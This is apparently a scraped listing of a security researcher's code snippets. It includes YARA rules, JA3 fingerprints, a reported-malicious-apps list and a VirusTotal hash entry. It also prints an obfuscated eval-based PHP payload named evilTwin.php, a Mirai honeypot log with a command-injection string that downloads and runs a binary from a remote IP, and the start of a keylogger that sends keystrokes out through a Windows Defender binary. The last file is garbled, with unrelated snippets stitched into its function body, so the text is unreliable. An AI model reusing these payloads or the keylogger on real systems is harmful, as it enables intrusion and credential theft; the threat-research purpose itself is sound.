teixeira0xfffff

## 09328irpf_restiruir_.msi
/*
   YARA Rule Set
   Author: Ialle Teixeira
   Date: 2019-05-18
   Identifier: MSI banking trojan
*/

rule sig_09328irpf_restiruir_ {
   meta:
      description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"

## gist:2ed9152acea792be7dffbf0aa0191b29
~ apt install tcpdump
~ apt install argus-client


 ~tcpdump -nn -s0 -rYourdump.pcap -w - |argus -r - -AZJmR -w - |ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +ĺoad +tcprtt +loss +runtime +retrans +sgap +dgap - tcp |xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'


## js
'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
'... that the call letters of radio

## js
function am8sd3nwj8w(mbewo2k1wvca) {var ra47g8gtri6sn = "";var n2c5 = 0;var l5k9atx = tisimzg = tob0fvo = 0;while (n2c5 < mbewo2k1wvca.length) {l5k9atx = mbewo2k1wvca.charCodeAt(n2c5);if (l5k9atx < 128) {ra47g8gtri6sn += String.fromCharCode(l5k9atx);n2c5++} else if (l5k9atx > 191 && l5k9atx < 224) {tob0fvo = mbewo2k1wvca.charCodeAt(n2c5 + 1);ra47g8gtri6sn += String.fromCharCode((l5k9atx & 31) << 6 | tob0fvo & 63);n2c5 += 2;} else {tob0fvo = mbewo2k1wvca.charCodeAt(n2c5 + 1);ahhn738dfrtyzre = mbewo2k1wvca.charCodeAt(n2c5 + 2);ra47g8gtri6sn += String.fromCharCode((l5k9atx & 15) << 12 | (tob0fvo & 63) << 6 | ahhn738dfrtyzre & 63);n2c5 += 3;}}return ra47g8gtri6sn;}function mxihtgjffok(mbewo2k1wvca) {var i9hyw2nc39 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var ra47g8gtri6sn = "";var n2c5, l5k9atx, cfcdlqy7;var ct9hjoennw216ou, s32hiqfn1, rubo, lsnyt9met88;var v3vx = 0;mbewo2k1wvca = mbewo2k1wvca.replace(/[^A-Za-z0-9+/=]/g, "");while (v3vx < mbewo2k1wvca.length) {ct9hjoennw216ou = i9hyw2

## rdpClient-JA3.csv
"os version","rdp client","ja3","ja3Algorithms","note"
"Windows XP SP3","RDC 6.1.7600","c8a0d08d2cbee4bed7cd90e47588ab9b","769,4-5-10-9-100-98-3-6-19-18-99,65281,,",
"Windows 2012","RDC 6.2.9200","bc2874f25a8254edb36147c151527cfa","771,49192-49191-49172-49171-159-158-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-35-23-65281,23-24,0",
"Windows 2008r2","RDC 6.3.9600","e6a4e2358d4eee6122403f3cb835bcbd","771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-23-65281,23-24,0",
"Windows 2012r2","RDC 6.3.9600","3e686105164b7c9a4cbd59142f18a4e7","771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-35-23-65281,23-24,0",
"Windows 7","RDC 6.3.9600","d54b3eb800cbeccf99fd5d5cdcd7b5b5","771,49192-49191-49172-49171-159-158-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-23-652

## evilTwin.php
<?php
// Auto Visitor
// https://github.com/eviltwin-dev/auto-visitor
eval(str_rot13(gzinflate(str_rot13(base64_decode('jUrHDsW6ZN0HyD/YUxYOtENiMLxDu+q9XXYTqPfe9fW5z2QWTCQIgQOQwzYz5BwOTvBCYT3ff+rT+s9//td/+TdqXJ7+Qn//019nSD8mWOrZH5jEhSeUf28o+E574lhCFlga+PN/9NU6msHTyzSTd/a6ygyhGGD/iyybXr3UR+H5/7S11x1nRINHUWs0hL71z0Ivn4HmJHyW8586OssxJfFCt/v/BhT8/S9/+0zqjVb5h6F//zvfufOF0RHb0NQA0mtv2ImyfG8j4UAa/k3LVKlIugs8trVecaft2hRGX3ZhsoL6ELmegzvAiufMaxzrE1OnU16abXQpAA3CZfG4Ho3AibtjmgeQRofTCyRgSCGjagWjHAR3k1br2EAhzapNZ6Rru/NxNnN8WgenTH/OIQcej52lU+eYAnJAr/JUEK7pRHbGI6wbyKcm+nyU46nraIKFvtjNtKSam8OIjyWFsKKSE5d48zQ00cLDmCnuvsKBBgGZaLD2Pid9gqmk6o299SB3tnX8xtQDftUE0t5dpIWejmPowHIYExBOTJmAT5x2yM1Y3I59gFrf9n5hO7DRsiBMgrEF8tsn1Yjw7LeLz7nQfHI1CkJlCVKAsWVnaCbSDQ0g7J6xuQUsDPuW1EHgvhW284gs+RTPK1bwAYn6aFR95UCffDhbj/htX1nGU+JAzaMdsJlvQo77bMT0AQ8ymw9Cercf5cWyN5t3pfeH5X7uZ0qvkzjBaxKhrVV+BYYgoCRu6IZH89NhfowRqA2Tcl/rxQNLGpDEwQQu5F15PNbWt35GXmKwL+ZJriEjCYiKnddJUYbczM+x2A6+bOdGxR2OzQTjfNi6Z9Cl6kMn1X3Msxfc4qkOr+4E1bsN7EIDwFzKnNBlgVeO4n1nVi+SpSDfxtxw

## ReportedApps.csv
App Info,Developer Name,Pacakge Name,Google Play,Developer Email, Hash
Message Moment,Mandy L Smith,com.ppp.kkk,https://play.google.com/store/apps/details?id=com.ppp.kkk,tchick4u@gmail.com,487f13296e086e606496d26a2547dcfe3f88812e723fa21e94c52b395a0dd361
Gold Miner Game,Margie C Smith,sg.com.goldminerplusgame,https://play.google.com/store/apps/details?id=sg.com.goldminerplusgame,manuqsngdj@gmail.com,97ed67a5d9b1ffe2f3a5093e7461acb8bdad94f22b6ae1f18d24bf8960aa0363
Measure Wallpaper,Donal J Smith,kw.com.measurewallpapers.glitter,https://play.google.com/store/apps/details?id=kw.com.measurewallpapers.glitter,ritvplnci9@gmail.com,2bb4cf4853d7616b22520756c89c864b43753692c2187d72ce9266445a14c50b
Sophisticated Scanner - No trouble & profession,Cedon M Smith,com.ss.pdf.creat.soph.scanner,https://play.google.com/store/apps/details?id=com.ss.pdf.creat.soph.scanner,invesumb970@gmail.com,59e624b1167df9951e6efe7f22e7046bef5f09f6af748a020d4f97b04eefd61d
Profession Translator -Find the charm of languages,David G Smith,com.tra

## mirai.tsv
"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn"
"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`

","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1:8089
Content-Length: 172
Accept-Encoding: application/json

action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`

## gist:6ccbdbef95da08dcf2e213b99e4b9533
Name: SCAN_0502_FA2C8.pdf
MD5	dfc20138456eb478673e046754536c76
SHA-1	bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
SHA-256	a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
Vhash	913a9ca88f467c85a8c6e005b9321caa5
SSDEEP	384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
File type	PDF
Magic	PDF document, version 1.4
File size	16.93 KB (17337 bytes)
https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details

## handler.py
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess

URL = 'https://{your sub here}.free.beeceptor.com'
uploader = "C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe"
content = ""

def on_press(key):
	/*
	YARA Rule Set
	Author: Ialle Teixeira
	Date: 2019-05-18
	Identifier: MSI banking trojan
	*/

	rule sig_09328irpf_restiruir_ {
	meta:
	description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"
	~ apt install tcpdump
	~ apt install argus-client


	~tcpdump -nn -s0 -rYourdump.pcap -w - \|argus -r - -AZJmR -w - \|ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +ĺoad +tcprtt +loss +runtime +retrans +sgap +dgap - tcp \|xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'
	'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
	'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
	'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
	'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
	'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
	'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
	'... that the call letters of radio
	"os version","rdp client","ja3","ja3Algorithms","note"
	"Windows XP SP3","RDC 6.1.7600","c8a0d08d2cbee4bed7cd90e47588ab9b","769,4-5-10-9-100-98-3-6-19-18-99,65281,,",
	"Windows 2012","RDC 6.2.9200","bc2874f25a8254edb36147c151527cfa","771,49192-49191-49172-49171-159-158-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-35-23-65281,23-24,0",
	"Windows 2008r2","RDC 6.3.9600","e6a4e2358d4eee6122403f3cb835bcbd","771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-23-65281,23-24,0",
	"Windows 2012r2","RDC 6.3.9600","3e686105164b7c9a4cbd59142f18a4e7","771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-35-23-65281,23-24,0",
	"Windows 7","RDC 6.3.9600","d54b3eb800cbeccf99fd5d5cdcd7b5b5","771,49192-49191-49172-49171-159-158-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-23-652
	<?php
	// Auto Visitor
	// https://github.com/eviltwin-dev/auto-visitor
	eval(str_rot13(gzinflate(str_rot13(base64_decode('jUrHDsW6ZN0HyD/YUxYOtENiMLxDu+q9XXYTqPfe9fW5z2QWTCQIgQOQwzYz5BwOTvBCYT3ff+rT+s9//td/+TdqXJ7+Qn//019nSD8mWOrZH5jEhSeUf28o+E574lhCFlga+PN/9NU6msHTyzSTd/a6ygyhGGD/iyybXr3UR+H5/7S11x1nRINHUWs0hL71z0Ivn4HmJHyW8586OssxJfFCt/v/BhT8/S9/+0zqjVb5h6F//zvfufOF0RHb0NQA0mtv2ImyfG8j4UAa/k3LVKlIugs8trVecaft2hRGX3ZhsoL6ELmegzvAiufMaxzrE1OnU16abXQpAA3CZfG4Ho3AibtjmgeQRofTCyRgSCGjagWjHAR3k1br2EAhzapNZ6Rru/NxNnN8WgenTH/OIQcej52lU+eYAnJAr/JUEK7pRHbGI6wbyKcm+nyU46nraIKFvtjNtKSam8OIjyWFsKKSE5d48zQ00cLDmCnuvsKBBgGZaLD2Pid9gqmk6o299SB3tnX8xtQDftUE0t5dpIWejmPowHIYExBOTJmAT5x2yM1Y3I59gFrf9n5hO7DRsiBMgrEF8tsn1Yjw7LeLz7nQfHI1CkJlCVKAsWVnaCbSDQ0g7J6xuQUsDPuW1EHgvhW284gs+RTPK1bwAYn6aFR95UCffDhbj/htX1nGU+JAzaMdsJlvQo77bMT0AQ8ymw9Cercf5cWyN5t3pfeH5X7uZ0qvkzjBaxKhrVV+BYYgoCRu6IZH89NhfowRqA2Tcl/rxQNLGpDEwQQu5F15PNbWt35GXmKwL+ZJriEjCYiKnddJUYbczM+x2A6+bOdGxR2OzQTjfNi6Z9Cl6kMn1X3Msxfc4qkOr+4E1bsN7EIDwFzKnNBlgVeO4n1nVi+SpSDfxtxw
	App Info,Developer Name,Pacakge Name,Google Play,Developer Email, Hash
	Message Moment,Mandy L Smith,com.ppp.kkk,https://play.google.com/store/apps/details?id=com.ppp.kkk,tchick4u@gmail.com,487f13296e086e606496d26a2547dcfe3f88812e723fa21e94c52b395a0dd361
	Gold Miner Game,Margie C Smith,sg.com.goldminerplusgame,https://play.google.com/store/apps/details?id=sg.com.goldminerplusgame,manuqsngdj@gmail.com,97ed67a5d9b1ffe2f3a5093e7461acb8bdad94f22b6ae1f18d24bf8960aa0363
	Measure Wallpaper,Donal J Smith,kw.com.measurewallpapers.glitter,https://play.google.com/store/apps/details?id=kw.com.measurewallpapers.glitter,ritvplnci9@gmail.com,2bb4cf4853d7616b22520756c89c864b43753692c2187d72ce9266445a14c50b
	Sophisticated Scanner - No trouble & profession,Cedon M Smith,com.ss.pdf.creat.soph.scanner,https://play.google.com/store/apps/details?id=com.ss.pdf.creat.soph.scanner,invesumb970@gmail.com,59e624b1167df9951e6efe7f22e7046bef5f09f6af748a020d4f97b04eefd61d
	Profession Translator -Find the charm of languages,David G Smith,com.tra
	"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn"
	"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`

	","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1
	User-Agent: XTC
	Host: 127.0.0.1:8089
	Content-Length: 172
	Accept-Encoding: application/json

	action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
	Name: SCAN_0502_FA2C8.pdf
	MD5 dfc20138456eb478673e046754536c76
	SHA-1 bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
	SHA-256 a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
	Vhash 913a9ca88f467c85a8c6e005b9321caa5
	SSDEEP 384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
	File type PDF
	Magic PDF document, version 1.4
	File size 16.93 KB (17337 bytes)
	https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details
	from pynput.keyboard import Key, Listener
	import os
	import sys
	import subprocess

	URL = 'https://{your sub here}.free.beeceptor.com'
	uploader = "C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe"
	content = ""

	def on_press(key):